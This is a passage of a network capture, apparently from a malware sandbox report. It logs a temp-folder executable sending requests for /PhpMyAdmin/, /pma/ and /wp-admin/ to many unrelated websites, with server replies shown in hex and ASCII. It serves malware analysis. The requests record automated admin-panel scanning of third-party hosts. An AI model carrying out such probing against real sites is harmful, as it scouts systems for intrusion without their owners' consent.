2023-11-30 10:22:44 UTC	221	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:44 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:44 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50710	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	167	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:44 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:44 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:44 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50791	3.33.224.147	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	156	OUT	GET / HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:44 UTC	409	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 62 37 30 37 62 30 63 37 34 37 61 62 32 63 33 66 62 33 39 63 66 37 35 61 61 36 39 31 62 30 30 Data Ascii: HTTP/1.1 200 OKServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=300, privateDate: Thu, 30 Nov 2023 10:22:44 GMTETag: "0b707b0c747ab2c3fb39cf75aa691b00
2023-11-30 10:22:44 UTC	15975	IN	Data Raw: 31 66 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 70 61 72 6b 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 Data Ascii: 1f18<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta property="environment" content="parking"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-widt
2023-11-30 10:22:44 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 69 6e 71 75 69 72 79 5f 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 77 2d 6d 69 6e 20 77 68 69 74 65 73 70 61 63 65 2d 6e 6f 77 72 61 70 20 74 65 78 74 2d 5b 31 35 70 78 5d 20 6c 65 61 64 69 6e 67 2d 5b 31 38 70 78 5d 20 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 20 74 65 78 74 2d 67 72 61 79 2d 37 0d 0a 32 30 30 30 0d 0a 30 30 20 21 74 65 78 74 2d 5b 31 34 70 78 5d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 26 6e 62 73 70 Data Ascii: <div class="flex flex-col"> <label for="inquiry_email" class="w-min whitespace-nowrap text-[15px] leading-[18px] font-semibold text-gray-7200000 !text-[14px]"> Email&nbsp
2023-11-30 10:22:45 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4c 54 22 20 3e 4c 54 20 2d 20 4c 69 74 68 75 61 6e 69 61 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4c 55 22 20 3e 4c 55 20 2d 20 4c 75 78 65 6d 62 6f 75 72 67 3c 2f 6f 70 0d 0a 31 30 30 30 0d 0a 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <option value="LT" >LT - Lithuania</option> <option value="LU" >LU - Luxembourg</op1000tion>
2023-11-30 10:22:45 UTC	7909	IN	Data Raw: 3a 72 69 6e 67 2d 32 20 66 6f 63 75 73 3a 72 69 6e 67 2d 70 72 69 6d 61 72 79 2d 6c 69 67 68 74 20 66 6f 63 75 73 3a 62 6f 72 64 65 72 20 66 6f 63 75 73 3a 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 64 69 73 61 62 6c 65 64 3a 62 67 2d 67 72 61 79 2d 31 30 30 20 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 20 72 6f 75 6e 64 65 64 2d 6d 64 20 73 68 61 64 6f 77 2d 73 6d 20 68 6f 76 65 72 3a 73 68 61 64 6f 77 20 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 73 68 61 64 6f 77 2d 73 6d 20 21 68 2d 5b 33 36 70 78 5d 20 66 6f 63 75 73 3a 21 72 69 6e 67 2d 62 6c 75 65 2d 32 30 30 20 66 6f 63 75 73 3a 21 62 6f 72 64 65 72 2d 67 72 61 79 Data Ascii: :ring-2 focus:ring-primary-light focus:border focus:border-primary disabled:cursor-not-allowed disabled:bg-gray-100 disabled:hover:border-gray-300 rounded-md shadow-sm hover:shadow disabled:hover:shadow-sm !h-[36px] focus:!ring-blue-200 focus:!border-gray

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50641	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	170	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:44 UTC	221	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:44 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:44 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50790	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	203	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
2023-11-30 10:22:45 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:44 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:45 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50871	15.197.172.60	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	276	OUT	GET /pma/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:44 UTC	764	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:44 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:44 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50792	194.63.248.47	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	205	OUT	GET /wp-admin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://z-a.com/wp-login.php
2023-11-30 10:22:45 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:45 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:45 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	51040	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	167	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:45 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:45 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:45 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	51246	216.37.42.12	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:44 UTC	168	OUT	GET /pma/ HTTP/1.1 Host: www.noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:45 UTC	213	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 34 20 44 65 63 20 32 30 30 38 20 31 31 3a 31 30 3a 32 38 20 47 4d 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 39 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:45 GMTServer: ApacheLast-Modified: Sun, 14 Dec 2008 11:10:28 GMTAccept-Ranges: bytesContent-Length: 1997Connection: closeContent-Type: text/html
